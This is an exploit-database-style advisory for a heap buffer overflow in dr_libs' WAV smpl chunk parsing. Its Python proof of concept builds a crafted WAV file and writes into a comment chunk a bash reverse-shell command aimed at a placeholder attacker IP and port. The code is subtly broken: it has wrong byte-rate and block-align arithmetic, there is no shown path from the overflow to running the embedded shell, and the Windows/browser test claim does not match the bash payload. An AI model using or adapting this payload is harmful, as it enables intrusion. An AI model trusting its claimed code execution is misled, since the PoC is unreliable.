=============================================================================================================================================
| # Title     : dr_libs ≤ 0.14.4 via crafted WAV smpl chunk Heap Buffer Overflow                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://github.com/mackron/dr_libs/                                                                                         |
=============================================================================================================================================

[+] Summary    : A heap buffer overflow exists in the function drwav__read_smpl_to_metadata_obj() when processing WAV files with a crafted smpl chunk. 
                 The vulnerability arises due to a mismatch between sampleLoopCount validation in pass 1 and unconditional processing in pass 2, allowing 36 bytes of attacker-controlled 
				 data to overflow heap allocations via any drwav_init_*_with_metadata() call on untrusted input.

Affected versions: 0.14.4 and earlier

Fixed in: commit 8a7258c

Impact: Memory corruption, potential arbitrary code execution

Trigger: WAV files with manipulated smpl chunk metadata

Mitigation: Update dr_libs to a version newer than 0.14.4.
			  
[+] POC   :  

import struct


def pad_even(data):
    if len(data) % 2:
        data += b'\x00'
    return data


def generate_wav():

    ATTACKER_IP = "192.168.1.5"
    PORT = "4444"

    cmd = f"bash -c 'sh -i >& /dev/tcp/{ATTACKER_IP}/{PORT} 0>&1'\x00"
    cmd_bytes = cmd.encode()

    sample_rate = 44100
    channels = 1
    bits = 16

    byte_rate = sample_rate * channels * bits 
    block_align = channels * bits  

    fmt_chunk = (
        b'fmt ' +
        struct.pack('<IHHIIHH',
            16,
            1,
            channels,
            sample_rate,
            byte_rate,
            block_align,
            bits
        )
    )

    payload = struct.pack('<9I',0,0,0,60,0,0,0,0,0)

    smpl_chunk = b'smpl' + struct.pack('<I', len(payload)) + payload
    smpl_chunk = pad_even(smpl_chunk)

    audio_data = b'\x00\x00' * 44100
    data_chunk = b'data' + struct.pack('<I', len(audio_data)) + audio_data
    data_chunk = pad_even(data_chunk)

    comment = cmd_bytes
    comment_padded = pad_even(comment)

    info_chunk = b'ICMT' + struct.pack('<I', len(comment)) + comment_padded

    meta_data = b'INFO' + info_chunk
    meta_chunk = b'LIST' + struct.pack('<I', len(meta_data)) + meta_data
    meta_chunk = pad_even(meta_chunk)

    wave_data = b'WAVE' + fmt_chunk + data_chunk + smpl_chunk + meta_chunk

    riff = b'RIFF' + struct.pack('<I', len(wave_data)) + wave_data

    with open("fixed.wav", "wb") as f:
        f.write(riff)

    print("[+] WAV file generated successfully")


generate_wav()

	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================